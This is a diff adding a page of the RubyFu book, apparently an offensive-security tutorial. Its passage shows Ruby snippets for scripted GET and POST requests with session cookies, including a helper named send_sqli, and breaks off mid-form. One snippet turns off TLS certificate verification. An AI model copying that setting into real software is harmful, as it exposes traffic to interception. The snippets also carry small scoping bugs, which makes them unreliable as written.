665
|
+
<i class="fa fa-check"></i>
|
666
|
+
|
667
|
+
<b>4.</b>
|
668
|
+
|
669
|
+
Module 0x4 | Web Kung Fu
|
670
|
+
</a>
|
671
|
+
|
672
|
+
|
673
|
+
<ul class="articles">
|
674
|
+
|
675
|
+
|
676
|
+
<li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
|
677
|
+
|
678
|
+
|
679
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
|
680
|
+
|
681
|
+
<i class="fa fa-check"></i>
|
682
|
+
|
683
|
+
<b>4.1.</b>
|
684
|
+
|
685
|
+
SQL Injection Scanner
|
686
|
+
</a>
|
687
|
+
|
688
|
+
|
689
|
+
</li>
|
690
|
+
|
691
|
+
<li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
|
692
|
+
|
693
|
+
|
694
|
+
<a href="../module_0x4__web_kung_fu/databases.html">
|
695
|
+
|
696
|
+
<i class="fa fa-check"></i>
|
697
|
+
|
698
|
+
<b>4.2.</b>
|
699
|
+
|
700
|
+
Databases
|
701
|
+
</a>
|
702
|
+
|
703
|
+
|
704
|
+
</li>
|
705
|
+
|
706
|
+
<li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
|
707
|
+
|
708
|
+
|
709
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
|
710
|
+
|
711
|
+
<i class="fa fa-check"></i>
|
712
|
+
|
713
|
+
<b>4.3.</b>
|
714
|
+
|
715
|
+
Extending Burp Suite
|
716
|
+
</a>
|
717
|
+
|
718
|
+
|
719
|
+
</li>
|
720
|
+
|
721
|
+
<li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
|
722
|
+
|
723
|
+
|
724
|
+
<a href="../module_0x4__web_kung_fu/browser_manipulation.html">
|
725
|
+
|
726
|
+
<i class="fa fa-check"></i>
|
727
|
+
|
728
|
+
<b>4.4.</b>
|
729
|
+
|
730
|
+
Browser Manipulation
|
731
|
+
</a>
|
732
|
+
|
733
|
+
|
734
|
+
</li>
|
735
|
+
|
736
|
+
<li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
737
|
+
|
738
|
+
|
739
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
740
|
+
|
741
|
+
<i class="fa fa-check"></i>
|
742
|
+
|
743
|
+
<b>4.5.</b>
|
744
|
+
|
745
|
+
Web Services and APIs
|
746
|
+
</a>
|
747
|
+
|
748
|
+
|
749
|
+
<ul class="articles">
|
750
|
+
|
751
|
+
|
752
|
+
<li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
|
753
|
+
|
754
|
+
|
755
|
+
<a href="../module_0x4__web_kung_fu/web_services.html">
|
756
|
+
|
757
|
+
<i class="fa fa-check"></i>
|
758
|
+
|
759
|
+
<b>4.5.1.</b>
|
760
|
+
|
761
|
+
Interacting with Web Services
|
762
|
+
</a>
|
763
|
+
|
764
|
+
|
765
|
+
</li>
|
766
|
+
|
767
|
+
<li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
|
768
|
+
|
769
|
+
|
770
|
+
<a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
|
771
|
+
|
772
|
+
<i class="fa fa-check"></i>
|
773
|
+
|
774
|
+
<b>4.5.2.</b>
|
775
|
+
|
776
|
+
Interacting with APIs
|
777
|
+
</a>
|
778
|
+
|
779
|
+
|
780
|
+
<ul class="articles">
|
781
|
+
|
782
|
+
|
783
|
+
<li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
|
784
|
+
|
785
|
+
|
786
|
+
<a href="../module_0x4__web_kung_fu/wordpress_api.html">
|
787
|
+
|
788
|
+
<i class="fa fa-check"></i>
|
789
|
+
|
790
|
+
<b>4.5.2.1.</b>
|
791
|
+
|
792
|
+
WordPress API
|
793
|
+
</a>
|
794
|
+
|
795
|
+
|
796
|
+
</li>
|
797
|
+
|
798
|
+
<li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
|
799
|
+
|
800
|
+
|
801
|
+
<a href="../module_0x4__web_kung_fu/twitter_api.html">
|
802
|
+
|
803
|
+
<i class="fa fa-check"></i>
|
804
|
+
|
805
|
+
<b>4.5.2.2.</b>
|
806
|
+
|
807
|
+
Twitter API
|
808
|
+
</a>
|
809
|
+
|
810
|
+
|
811
|
+
</li>
|
812
|
+
|
813
|
+
|
814
|
+
</ul>
|
815
|
+
|
816
|
+
</li>
|
817
|
+
|
818
|
+
|
819
|
+
</ul>
|
820
|
+
|
821
|
+
</li>
|
822
|
+
|
823
|
+
<li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
|
824
|
+
|
825
|
+
|
826
|
+
<a href="../module_0x4__web_kung_fu/ruby2javascript.html">
|
827
|
+
|
828
|
+
<i class="fa fa-check"></i>
|
829
|
+
|
830
|
+
<b>4.6.</b>
|
831
|
+
|
832
|
+
Ruby 2 JavaScript
|
833
|
+
</a>
|
834
|
+
|
835
|
+
|
836
|
+
</li>
|
837
|
+
|
838
|
+
<li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
|
839
|
+
|
840
|
+
|
841
|
+
<a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
|
842
|
+
|
843
|
+
<i class="fa fa-check"></i>
|
844
|
+
|
845
|
+
<b>4.7.</b>
|
846
|
+
|
847
|
+
Web Server and Proxy
|
848
|
+
</a>
|
849
|
+
|
850
|
+
|
851
|
+
</li>
|
852
|
+
|
853
|
+
|
854
|
+
</ul>
|
855
|
+
|
856
|
+
</li>
|
857
|
+
|
858
|
+
<li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
|
859
|
+
|
860
|
+
|
861
|
+
<a href="../module_0x5__exploitation_kung_fu/index.html">
|
862
|
+
|
863
|
+
<i class="fa fa-check"></i>
|
864
|
+
|
865
|
+
<b>5.</b>
|
866
|
+
|
867
|
+
Module 0x5 | Exploitation Kung Fu
|
868
|
+
</a>
|
869
|
+
|
870
|
+
|
871
|
+
<ul class="articles">
|
872
|
+
|
873
|
+
|
874
|
+
<li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
|
875
|
+
|
876
|
+
|
877
|
+
<a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
|
878
|
+
|
879
|
+
<i class="fa fa-check"></i>
|
880
|
+
|
881
|
+
<b>5.1.</b>
|
882
|
+
|
883
|
+
Fuzzer
|
884
|
+
</a>
|
885
|
+
|
886
|
+
|
887
|
+
</li>
|
888
|
+
|
889
|
+
<li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
|
890
|
+
|
891
|
+
|
892
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html">
|
893
|
+
|
894
|
+
<i class="fa fa-check"></i>
|
895
|
+
|
896
|
+
<b>5.2.</b>
|
897
|
+
|
898
|
+
Metasploit
|
899
|
+
</a>
|
900
|
+
|
901
|
+
|
902
|
+
<ul class="articles">
|
903
|
+
|
904
|
+
|
905
|
+
<li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
906
|
+
|
907
|
+
|
908
|
+
<a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
909
|
+
|
910
|
+
<i class="fa fa-check"></i>
|
911
|
+
|
912
|
+
<b>5.2.1.</b>
|
913
|
+
|
914
|
+
Auxiliary module
|
915
|
+
</a>
|
916
|
+
|
917
|
+
|
918
|
+
</li>
|
919
|
+
|
920
|
+
<li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
|
921
|
+
|
922
|
+
|
923
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
|
924
|
+
|
925
|
+
<i class="fa fa-check"></i>
|
926
|
+
|
927
|
+
<b>5.2.2.</b>
|
928
|
+
|
929
|
+
Exploit module
|
930
|
+
</a>
|
931
|
+
|
932
|
+
|
933
|
+
</li>
|
934
|
+
|
935
|
+
<li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
|
936
|
+
|
937
|
+
|
938
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
|
939
|
+
|
940
|
+
<i class="fa fa-check"></i>
|
941
|
+
|
942
|
+
<b>5.2.3.</b>
|
943
|
+
|
944
|
+
Meterpreter
|
945
|
+
</a>
|
946
|
+
|
947
|
+
|
948
|
+
<ul class="articles">
|
949
|
+
|
950
|
+
|
951
|
+
<li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
|
952
|
+
|
953
|
+
|
954
|
+
<a href="../module_0x5__exploitation_kung_fu/extensions.html">
|
955
|
+
|
956
|
+
<i class="fa fa-check"></i>
|
957
|
+
|
958
|
+
<b>5.2.3.1.</b>
|
959
|
+
|
960
|
+
API and Extensions
|
961
|
+
</a>
|
962
|
+
|
963
|
+
|
964
|
+
</li>
|
965
|
+
|
966
|
+
<li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
967
|
+
|
968
|
+
|
969
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
970
|
+
|
971
|
+
<i class="fa fa-check"></i>
|
972
|
+
|
973
|
+
<b>5.2.3.2.</b>
|
974
|
+
|
975
|
+
Meterpreter Scripting
|
976
|
+
</a>
|
977
|
+
|
978
|
+
|
979
|
+
</li>
|
980
|
+
|
981
|
+
<li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
982
|
+
|
983
|
+
|
984
|
+
<a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
985
|
+
|
986
|
+
<i class="fa fa-check"></i>
|
987
|
+
|
988
|
+
<b>5.2.3.3.</b>
|
989
|
+
|
990
|
+
Railgun API Extension
|
991
|
+
</a>
|
992
|
+
|
993
|
+
|
994
|
+
</li>
|
995
|
+
|
996
|
+
|
997
|
+
</ul>
|
998
|
+
|
999
|
+
</li>
|
1000
|
+
|
1001
|
+
|
1002
|
+
</ul>
|
1003
|
+
|
1004
|
+
</li>
|
1005
|
+
|
1006
|
+
<li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
|
1007
|
+
|
1008
|
+
|
1009
|
+
<a href="../module_0x5__exploitation_kung_fu/metasm.html">
|
1010
|
+
|
1011
|
+
<i class="fa fa-check"></i>
|
1012
|
+
|
1013
|
+
<b>5.3.</b>
|
1014
|
+
|
1015
|
+
metasm
|
1016
|
+
</a>
|
1017
|
+
|
1018
|
+
|
1019
|
+
</li>
|
1020
|
+
|
1021
|
+
|
1022
|
+
</ul>
|
1023
|
+
|
1024
|
+
</li>
|
1025
|
+
|
1026
|
+
<li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
|
1027
|
+
|
1028
|
+
|
1029
|
+
<a href="../module_0x6__forensic/index.html">
|
1030
|
+
|
1031
|
+
<i class="fa fa-check"></i>
|
1032
|
+
|
1033
|
+
<b>6.</b>
|
1034
|
+
|
1035
|
+
Module 0x6 | Forensic Kung Fu
|
1036
|
+
</a>
|
1037
|
+
|
1038
|
+
|
1039
|
+
<ul class="articles">
|
1040
|
+
|
1041
|
+
|
1042
|
+
<li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
|
1043
|
+
|
1044
|
+
|
1045
|
+
<a href="../module_0x6__forensic/windows_forensic.html">
|
1046
|
+
|
1047
|
+
<i class="fa fa-check"></i>
|
1048
|
+
|
1049
|
+
<b>6.1.</b>
|
1050
|
+
|
1051
|
+
Windows Forensic
|
1052
|
+
</a>
|
1053
|
+
|
1054
|
+
|
1055
|
+
</li>
|
1056
|
+
|
1057
|
+
<li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
|
1058
|
+
|
1059
|
+
|
1060
|
+
<a href="../module_0x6__forensic/android_forensic.html">
|
1061
|
+
|
1062
|
+
<i class="fa fa-check"></i>
|
1063
|
+
|
1064
|
+
<b>6.2.</b>
|
1065
|
+
|
1066
|
+
Android Forensic
|
1067
|
+
</a>
|
1068
|
+
|
1069
|
+
|
1070
|
+
</li>
|
1071
|
+
|
1072
|
+
<li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1073
|
+
|
1074
|
+
|
1075
|
+
<a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1076
|
+
|
1077
|
+
<i class="fa fa-check"></i>
|
1078
|
+
|
1079
|
+
<b>6.3.</b>
|
1080
|
+
|
1081
|
+
Network Traffic Analysis
|
1082
|
+
</a>
|
1083
|
+
|
1084
|
+
|
1085
|
+
</li>
|
1086
|
+
|
1087
|
+
<li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
|
1088
|
+
|
1089
|
+
|
1090
|
+
<a href="../module_0x6__forensic/parsing_log_files.html">
|
1091
|
+
|
1092
|
+
<i class="fa fa-check"></i>
|
1093
|
+
|
1094
|
+
<b>6.4.</b>
|
1095
|
+
|
1096
|
+
Parsing Log Files
|
1097
|
+
</a>
|
1098
|
+
|
1099
|
+
|
1100
|
+
</li>
|
1101
|
+
|
1102
|
+
|
1103
|
+
</ul>
|
1104
|
+
|
1105
|
+
</li>
|
1106
|
+
|
1107
|
+
<li class="chapter " data-level="7" data-path="references/index.html">
|
1108
|
+
|
1109
|
+
|
1110
|
+
<a href="../references/index.html">
|
1111
|
+
|
1112
|
+
<i class="fa fa-check"></i>
|
1113
|
+
|
1114
|
+
<b>7.</b>
|
1115
|
+
|
1116
|
+
References
|
1117
|
+
</a>
|
1118
|
+
|
1119
|
+
|
1120
|
+
</li>
|
1121
|
+
|
1122
|
+
<li class="chapter " data-level="8" data-path="faqs/index.html">
|
1123
|
+
|
1124
|
+
|
1125
|
+
<a href="../faqs/index.html">
|
1126
|
+
|
1127
|
+
<i class="fa fa-check"></i>
|
1128
|
+
|
1129
|
+
<b>8.</b>
|
1130
|
+
|
1131
|
+
FAQs
|
1132
|
+
</a>
|
1133
|
+
|
1134
|
+
|
1135
|
+
</li>
|
1136
|
+
|
1137
|
+
<li class="chapter " data-level="9" data-path="contributors/index.html">
|
1138
|
+
|
1139
|
+
|
1140
|
+
<a href="../contributors/index.html">
|
1141
|
+
|
1142
|
+
<i class="fa fa-check"></i>
|
1143
|
+
|
1144
|
+
<b>9.</b>
|
1145
|
+
|
1146
|
+
Contributors
|
1147
|
+
</a>
|
1148
|
+
|
1149
|
+
|
1150
|
+
<ul class="articles">
|
1151
|
+
|
1152
|
+
|
1153
|
+
<li class="chapter " data-level="9.1" data-path="contributors/todo.html">
|
1154
|
+
|
1155
|
+
|
1156
|
+
<a href="../contributors/todo.html">
|
1157
|
+
|
1158
|
+
<i class="fa fa-check"></i>
|
1159
|
+
|
1160
|
+
<b>9.1.</b>
|
1161
|
+
|
1162
|
+
TODO
|
1163
|
+
</a>
|
1164
|
+
|
1165
|
+
|
1166
|
+
</li>
|
1167
|
+
|
1168
|
+
|
1169
|
+
</ul>
|
1170
|
+
|
1171
|
+
</li>
|
1172
|
+
|
1173
|
+
|
1174
|
+
|
1175
|
+
|
1176
|
+
<li class="divider"></li>
|
1177
|
+
<li>
|
1178
|
+
<a href="https://www.gitbook.com" target="blank" class="gitbook-link">
|
1179
|
+
Published with GitBook
|
1180
|
+
</a>
|
1181
|
+
</li>
|
1182
|
+
|
1183
|
+
</ul>
|
1184
|
+
</nav>
|
1185
|
+
</div>
|
1186
|
+
|
1187
|
+
<div class="book-body">
|
1188
|
+
<div class="body-inner">
|
1189
|
+
<div class="book-header" role="navigation">
|
1190
|
+
<!-- Actions Left -->
|
1191
|
+
|
1192
|
+
|
1193
|
+
<!-- Title -->
|
1194
|
+
<h1>
|
1195
|
+
<i class="fa fa-circle-o-notch fa-spin"></i>
|
1196
|
+
<a href="../" >RubyFu</a>
|
1197
|
+
</h1>
|
1198
|
+
</div>
|
1199
|
+
|
1200
|
+
<div class="page-wrapper" tabindex="-1" role="main">
|
1201
|
+
<div class="page-inner">
|
1202
|
+
|
1203
|
+
|
1204
|
+
<section class="normal" id="section-">
|
1205
|
+
|
1206
|
+
<h1 id="chapter-0x4--web-kung-fu"><a name="chapter-0x4--web-kung-fu" class="plugin-anchor" href="#chapter-0x4--web-kung-fu"><span class="fa fa-link"></span></a>Chapter 0x4 | Web Kung Fu</h1>
|
1207
|
+
<h2 id="send-get-request"><a name="send-get-request" class="plugin-anchor" href="#send-get-request"><span class="fa fa-link"></span></a>Send Get request</h2>
|
1208
|
+
<h3 id="using-nethttp"><a name="using-nethttp" class="plugin-anchor" href="#using-nethttp"><span class="fa fa-link"></span></a>Using Net::HTTP</h3>
|
1209
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1210
|
+
<span class="hljs-comment"># KING SABRI</span>
|
1211
|
+
<span class="hljs-comment"># Usage | ruby send_get.rb [HOST] [SESSION_ID]</span>
|
1212
|
+
<span class="hljs-comment">#</span>
|
1213
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">"net/http"</span>
|
1214
|
+
|
1215
|
+
host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>] || <span class="hljs-string">"172.16.50.139"</span>
|
1216
|
+
session_id = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">1</span>] || <span class="hljs-string">"3c0e9a7edfa6682cb891f1c3df8a33ad"</span>
|
1217
|
+
|
1218
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_sqli</span><span class="hljs-params">(query)</span></span>
|
1219
|
+
|
1220
|
+
uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">"https://<span class="hljs-subst">#{host}</span>/script/path/file.php?"</span>)
|
1221
|
+
uri.query = <span class="hljs-constant">URI</span>.encode_www_form({<span class="hljs-string">"var1"</span>=> <span class="hljs-string">"val1"</span>,
|
1222
|
+
<span class="hljs-string">"var2"</span>=> <span class="hljs-string">"val2"</span>,
|
1223
|
+
<span class="hljs-string">"var3"</span>=> <span class="hljs-string">"val3"</span>})
|
1224
|
+
|
1225
|
+
http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
|
1226
|
+
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">'https'</span> <span class="hljs-comment"># Enable HTTPS support if it's HTTPS</span>
|
1227
|
+
|
1228
|
+
request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri.request_uri)
|
1229
|
+
request[<span class="hljs-string">"User-Agent"</span>] = <span class="hljs-string">"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"</span>
|
1230
|
+
request[<span class="hljs-string">"Connection"</span>] = <span class="hljs-string">"keep-alive"</span>
|
1231
|
+
request[<span class="hljs-string">"Accept-Language"</span>] = <span class="hljs-string">"en-US,en;q=0.5"</span>
|
1232
|
+
request[<span class="hljs-string">"Accept-Encoding"</span>] = <span class="hljs-string">"gzip, deflate"</span>
|
1233
|
+
request[<span class="hljs-string">"Accept"</span>] = <span class="hljs-string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>
|
1234
|
+
request[<span class="hljs-string">"PHPSESSID"</span>] = session_id
|
1235
|
+
|
1236
|
+
<span class="hljs-keyword">begin</span>
|
1237
|
+
puts <span class="hljs-string">"Sending.. "</span>
|
1238
|
+
response = http.request(request).body
|
1239
|
+
<span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> => e
|
1240
|
+
puts <span class="hljs-string">"[!] Failed!"</span>
|
1241
|
+
puts e
|
1242
|
+
<span class="hljs-keyword">end</span>
|
1243
|
+
|
1244
|
+
<span class="hljs-keyword">end</span>
|
1245
|
+
</code></pre>
|
1246
|
+
<h3 id="using-openuri"><a name="using-openuri" class="plugin-anchor" href="#using-openuri"><span class="fa fa-link"></span></a>Using Open-uri</h3>
|
1247
|
+
<p>Here another way to do the same thing </p>
|
1248
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1249
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'open-uri'</span>
|
1250
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'openssl'</span>
|
1251
|
+
|
1252
|
+
host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>] || <span class="hljs-string">"172.16.50.139"</span>
|
1253
|
+
session_id = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">1</span>] || <span class="hljs-string">"3c0e9a7edfa6682cb891f1c3df8a33ad"</span>
|
1254
|
+
|
1255
|
+
|
1256
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_sqli</span></span>
|
1257
|
+
uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">"https://<span class="hljs-subst">#{host}</span>/script/path/file.php?var1=val1&var2=val2&var3=val3"</span>)
|
1258
|
+
headers =
|
1259
|
+
{
|
1260
|
+
<span class="hljs-string">"User-Agent"</span> => <span class="hljs-string">"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"</span>,
|
1261
|
+
<span class="hljs-string">"Connection"</span> => <span class="hljs-string">"keep-alive"</span>,
|
1262
|
+
<span class="hljs-string">"Accept-Language"</span> => <span class="hljs-string">"en-US,en;q=0.5"</span>,
|
1263
|
+
<span class="hljs-string">"Accept-Encoding"</span> => <span class="hljs-string">"gzip, deflate"</span>,
|
1264
|
+
<span class="hljs-string">"Accept"</span> => <span class="hljs-string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>,
|
1265
|
+
<span class="hljs-string">"Cookie"</span> => <span class="hljs-string">"PHPSESSID=<span class="hljs-subst">#{session_id}</span>"</span>
|
1266
|
+
}
|
1267
|
+
request = open(uri, <span class="hljs-symbol">:ssl_verify_mode</span> => <span class="hljs-constant">OpenSSL::SSL::VERIFY_NONE</span>, headers)
|
1268
|
+
puts <span class="hljs-string">"Sending.. "</span>
|
1269
|
+
response = request.read
|
1270
|
+
puts response
|
1271
|
+
<span class="hljs-keyword">end</span>
|
1272
|
+
</code></pre>
|
1273
|
+
<h2 id="send-http-post-request-with-custom-headers"><a name="send-http-post-request-with-custom-headers" class="plugin-anchor" href="#send-http-post-request-with-custom-headers"><span class="fa fa-link"></span></a>Send HTTP Post request with custom headers</h2>
|
1274
|
+
<p>Here the post body from a file</p>
|
1275
|
+
<pre><code class="lang-ruby"><span class="hljs-keyword">require</span> <span class="hljs-string">'net/http'</span>
|
1276
|
+
|
1277
|
+
uri = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">"http://example.com/Pages/PostPage.aspx"</span>
|
1278
|
+
headers =
|
1279
|
+
{
|
1280
|
+
<span class="hljs-string">'Referer'</span> => <span class="hljs-string">'http://example.com/Pages/SomePage.aspx'</span>,
|
1281
|
+
<span class="hljs-string">'Cookie'</span> => <span class="hljs-string">'TS9e4B=ae79efe; WSS_FullScrende=false; ASP.NET_SessionId=rxuvh3l5dam'</span>,
|
1282
|
+
<span class="hljs-string">'Connection'</span> => <span class="hljs-string">'keep-alive'</span>,
|
1283
|
+
<span class="hljs-string">'Content-Type'</span> =><span class="hljs-string">'application/x-www-form-urlencoded'</span>
|
1284
|
+
}
|
1285
|
+
post = <span class="hljs-constant">File</span>.read post_file <span class="hljs-comment"># Raw Post Body's Data</span>
|
1286
|
+
http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
|
1287
|
+
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">'https'</span> <span class="hljs-comment"># Enable HTTPS support if it's HTTPS</span>
|
1288
|
+
request = <span class="hljs-constant">Net::HTTP::Post</span>.new(uri.path, headers)
|
1289
|
+
request.body = post
|
1290
|
+
response = http.request request
|
1291
|
+
puts response.code
|
1292
|
+
puts response.body
|
1293
|
+
</code></pre>
|
1294
|
+
<h2 id="more-control-on-post-variables"><a name="more-control-on-post-variables" class="plugin-anchor" href="#more-control-on-post-variables"><span class="fa fa-link"></span></a>More control on Post variables</h2>
|
1295
|
+
<p>Let's to take the following form as a simple post form to mimic in our script</p>
|
1296
|
+
<table>
|
1297
|
+
<thead>
|
1298
|
+
<tr>
|
1299
|
+
<th style="text-align:center"><img src="../images/module04/webfu__post_form1.png" alt="PostForm"></th>
|
1300
|
+
</tr>
|
1301
|
+
</thead>
|
1302
|
+
<tbody>
|
1303
|
+
<tr>
|
1304
|
+
<td style="text-align:center"><strong>Figure 1.</strong> Simple Post form</td>
|
1305
|
+
</tr>
|
1306
|
+
</tbody>
|
1307
|
+
</table>
|
1308
|
+
<p>Post form code:</p>
|
1309
|
+
<pre><code class="lang-html"><span class="hljs-tag"><<span class="hljs-title">FORM</span> <span class="hljs-attribute">METHOD</span>=<span class="hljs-value">POST</span> <span class="hljs-attribute">ACTION</span>=<span class="hljs-value">"http://wwwx.cs.unc.edu/~jbs/aw-wwwp/docs/resources/perl/perl-cgi/programs/cgi_stdin.cgi"</span>></span>
|
1310
|
+
|
1311
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Name field: <span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"text"</span> <span class="hljs-attribute">Name</span>=<span class="hljs-value">"name"</span> <span class="hljs-attribute">SIZE</span>=<span class="hljs-value">30</span> <span class="hljs-attribute">VALUE</span> = "<span class="hljs-attribute">You</span> <span class="hljs-attribute">name</span>"></span>
|
1312
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Name field: <span class="hljs-tag"><<span class="hljs-title">TEXTAREA</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"textarea"</span> <span class="hljs-attribute">ROWS</span>=<span class="hljs-value">5</span> <span class="hljs-attribute">COLS</span>=<span class="hljs-value">30</span> <span class="hljs-attribute">Name</span>=<span class="hljs-value">"textarea"</span>></span>Your comment.<span class="hljs-tag"></<span class="hljs-title">TEXTAREA</span>></span>
|
1313
|
+
|
1314
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Your age: <span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"radio"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"radiobutton"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"youngun"</span>></span> younger than 21,
|
1315
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"radio"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"radiobutton"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"middleun"</span> <span class="hljs-attribute">CHECKED</span>></span> 21 -59,
|
1316
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"radio"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"radiobutton"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"oldun"</span>></span> 60 or older
|
1317
|
+
|
1318
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Things you like:
|
1319
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"pizza"</span> <span class="hljs-attribute">CHECKED</span>></span>pizza,
|
1320
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"hamburgers"</span> <span class="hljs-attribute">CHECKED</span>></span>hamburgers,
|
1321
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"spinich"</span>></span>spinich,
|
1322
|
+
<span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"checkbox"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"checkedbox"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"mashed potatoes"</span> <span class="hljs-attribute">CHECKED</span>></span>mashed potatoes
|
1323
|
+
|
1324
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>What you like most:
|
1325
|
+
<span class="hljs-tag"><<span class="hljs-title">SELECT</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"selectitem"</span>></span>
|
1326
|
+
